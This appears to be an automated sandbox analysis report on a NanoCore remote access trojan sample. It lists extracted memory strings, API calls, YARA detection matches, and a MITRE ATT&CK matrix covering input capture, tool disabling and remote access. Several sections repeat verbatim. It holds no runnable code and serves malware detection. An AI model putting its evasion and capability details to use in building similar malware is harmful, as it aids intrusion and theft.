Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp, DiagnosticsHub.StandardCollector.Service.exe.bat	Binary or memory string: Shell_TrayWnd
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: RegAsm.exe, 00000001.00000002.519590997.0000000002BDF000.00000004.00000001.sdmp	Binary or memory string: Program Manager<
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: RegAsm.exe, 00000001.00000002.521170908.0000000002DD9000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp, DiagnosticsHub.StandardCollector.Service.exe.bat	Binary or memory string: Shell_TrayWnd
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: RegAsm.exe, 00000001.00000002.519590997.0000000002BDF000.00000004.00000001.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E886B cpuid		0_2_009E886B
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E886B cpuid		0_2_009E886B

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,		0_2_009F50D7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,		0_2_009F50D7

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A02230 GetUserNameW,		0_2_00A02230
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A02230 GetUserNameW,		0_2_00A02230

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F418A _free,_strlen,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,		0_2_009F418A
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F418A _free,_strlen,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,		0_2_009F418A

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,		0_2_009C4AFE
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,		0_2_009C4AFE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid			Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
Source: Yara match	File source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
Source: Yara match	File source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
Source: Yara match	File source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_81
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_XP
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_XPe
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_VISTA
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_7
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_8
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_81
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_XP
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_XPe
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_VISTA
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_7
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: WIN_8
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000001.00000002.519042278.0000000002B51000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000001.00000002.519042278.0000000002B51000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000001.00000002.519042278.0000000002B51000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000001.00000002.519042278.0000000002B51000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
Source: Yara match	File source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
Source: Yara match	File source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
Source: Yara match	File source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00A36596
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00A36A5A
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00A36596
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00A36A5A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04EB262A bind,	1_2_04EB262A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04EB25D8 bind,	1_2_04EB25D8

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts2	Native API1	Startup Items1	Startup Items1	Disable or Modify Tools11	Input Capture31	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	DLL Side-Loading1	Exploitation for Privilege Escalation1	Deobfuscate/Decode Files or Information11	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture31	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Application Shimming1	DLL Side-Loading1	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Valid Accounts2	Application Shimming1	Software Packing11	NTDS	System Information Discovery26	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
